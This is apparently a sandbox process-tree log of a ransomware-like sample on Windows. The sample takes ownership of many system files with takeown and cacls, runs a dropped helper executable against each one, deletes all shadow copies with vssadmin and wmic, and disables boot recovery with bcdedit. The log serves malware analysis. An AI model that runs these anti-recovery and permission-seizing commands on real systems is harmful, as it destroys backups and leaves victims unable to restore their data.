C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "background.png" -nobanner3⤵PID:5632
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "background.png" -nobanner4⤵PID:5556
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""2⤵PID:5940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C3⤵PID:5972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"3⤵
- Modifies file permissions
PID:5728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner3⤵PID:5924
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner4⤵PID:5892
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""2⤵PID:3860
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C3⤵PID:4608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"3⤵
- Modifies file permissions
PID:5296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner3⤵PID:5232
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner4⤵PID:4648
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5180
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm""2⤵PID:5316
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm" /E /G Admin:F /C3⤵PID:5216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm"3⤵
- Modifies file permissions
PID:3844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "SmsInterceptStore.jfm" -nobanner3⤵PID:260
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "SmsInterceptStore.jfm" -nobanner4⤵PID:5196
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5412
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\Diagnosis\parse.dat""2⤵PID:5452
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\parse.dat" /E /G Admin:F /C3⤵PID:5664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\parse.dat"3⤵PID:5804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "parse.dat" -nobanner3⤵PID:5772
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "parse.dat" -nobanner4⤵PID:5840
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs""2⤵PID:5888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs" /E /G Admin:F /C3⤵PID:5040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs"3⤵
- Modifies file permissions
PID:6128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "edbres00001.jrs" -nobanner3⤵PID:6020
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "edbres00001.jrs" -nobanner4⤵PID:5964
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""2⤵PID:5312
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C3⤵PID:6068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"3⤵
- Modifies file permissions
PID:4880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "TileCache_100_0_Data.bin" -nobanner3⤵PID:5176
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "TileCache_100_0_Data.bin" -nobanner4⤵PID:5524
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:280
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""2⤵PID:272
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C3⤵PID:5900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"3⤵
- Modifies file permissions
PID:5600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "TileCache_100_0_Header.bin" -nobanner3⤵PID:5560
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "TileCache_100_0_Header.bin" -nobanner4⤵PID:5764
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5628
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""2⤵PID:5644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C3⤵PID:6136
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"3⤵
- Modifies file permissions
PID:6028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "OfficeIntegrator.ps1" -nobanner3⤵PID:4400
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "OfficeIntegrator.ps1" -nobanner4⤵PID:5980
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:5916
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:5164
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:5652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "watermark.png" -nobanner3⤵PID:5740
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "watermark.png" -nobanner4⤵PID:5168
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""2⤵PID:268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C3⤵PID:5836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"3⤵
- Modifies file permissions
PID:5976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner3⤵PID:2768
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner4⤵PID:5620
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5864
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:5148
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:4856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Modifies file permissions
PID:5552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "background.png" -nobanner3⤵PID:5624
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "background.png" -nobanner4⤵PID:4668
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json""2⤵PID:6044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json" /E /G Admin:F /C3⤵PID:5284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json"3⤵
- Modifies file permissions
PID:4468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "utc.tracing.json" -nobanner3⤵PID:5784
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "utc.tracing.json" -nobanner4⤵PID:5792
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:5136
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:6052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵PID:5852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:5520
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵PID:6088
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4312
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\ljRsjfML.bat"1⤵PID:4608
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:4312
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5396
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:5608
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:5768
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:5796
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4840